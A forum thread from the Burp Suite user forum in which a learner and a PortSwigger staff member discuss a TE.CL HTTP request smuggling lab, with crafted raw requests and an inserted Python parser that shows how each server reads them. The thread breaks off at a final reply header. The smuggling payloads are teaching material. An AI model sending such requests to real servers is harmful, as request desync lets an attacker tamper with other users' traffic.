The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


"Lab: HTTP request smuggling, basic TE.CL vulnerability" need help in understanding

Anton | Last updated: Feb 17, 2020 03:15PM UTC

Hello, I'm trying to figure out what is going on under the hood, but with no luck so far. Trying the following as a possible solution, I don't understand why the response is "Unrecognized method G0POST". Why is there a zero before "POST"?

Request:

    POST / HTTP/1.1
    Host: ac2f1f0e1ea3d02180733e8600de008b.web-security-academy.net
    Content-Type: application/x-www-form-urlencoded
    Transfer-Encoding: chunked
    Content-length: 3

    1
    G
    0

I appreciate any help. Thanks.

Hannah, PortSwigger Agent | Last updated: Feb 17, 2020 03:53PM UTC

Because your content-length is 3, that means that your first request stops after the "1". The following characters are prepended to the next post request. When the next request is sent, the G and 0 are prepended to the POST. This is why it will come up with G0POST. Have you had a look at the solution for the lab you are trying to complete? The TE.CL solution request looks significantly different to your request.

Anton | Last updated: Feb 17, 2020 04:15PM UTC

Yes, I solved the lab with the solution provided in the lab. I guess I see what is going on there. Correct me please if my understanding is wrong.

Request:

    ...
    Content-length: 4
    Transfer-Encoding: chunked

    5c
    GPOST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 15

    x=1
    0

-----------------

Content-length: 4 - that means "5c\r\n"; the first request stops right after this blob.

GPOST / HTTP/1.1 - instead of prepending "G" to "POST" (that I was trying to achieve) it explicitly issues a GPOST request.

Does it sound right?
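An added illustration, not part of the original thread or of the lab material: a small parser that applies the front-end's chunked view and the back-end's Content-Length view to the two requests quoted above and returns the bytes left over on the back-end connection. The host name `lab.example` and all function names are assumptions made for this example.

```python
# Added illustration: parsing only, nothing is sent over the network.
def split_head(raw):
    """Return (headers keyed by lower-case name, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, body

def chunked_end(body):
    """Offset just past the terminating zero-size chunk (front-end view)."""
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)   # hex size, extensions dropped
        pos = eol + 2
        if size == 0:
            return body.index(b"\r\n", pos) + 2        # assumes no trailer headers
        if body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF")
        pos += size + 2

def te_cl_view(raw):
    """Return (body the front-end forwards, bytes the back-end consumes as
    the body, bytes left on the connection for the back-end's next request)."""
    headers, body = split_head(raw)
    forwarded = body[:chunked_end(body)]          # front-end: Transfer-Encoding
    cl = int(headers[b"content-length"])          # back-end: Content-Length
    return forwarded, forwarded[:cl], forwarded[cl:]

# Constructed inputs mirroring the two requests in the thread (placeholder host).
FIRST = (b"POST / HTTP/1.1\r\nHost: lab.example\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n"
         b"Transfer-Encoding: chunked\r\nContent-length: 3\r\n\r\n"
         b"1\r\nG\r\n0\r\n\r\n")
SMUGGLED = (b"GPOST / HTTP/1.1\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: 15\r\n\r\nx=1")       # 92 bytes, i.e. 0x5c
SECOND = (b"POST / HTTP/1.1\r\nHost: lab.example\r\n"
          b"Content-length: 4\r\nTransfer-Encoding: chunked\r\n\r\n"
          b"5c\r\n" + SMUGGLED + b"\r\n0\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("first attempt", FIRST), ("lab solution", SECOND)):
        _, consumed, leftover = te_cl_view(req)
        print(label, "| back-end body:", consumed, "| left over:", leftover)
```

For the first request the leftover is `G\r\n0\r\n\r\n`, the bytes that then sit in front of the next request's `POST`; for the second it begins with a complete `GPOST / HTTP/1.1` request line.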

Hannah, PortSwigger Agent | Last updated: Feb 17, 2020 04:33PM UTC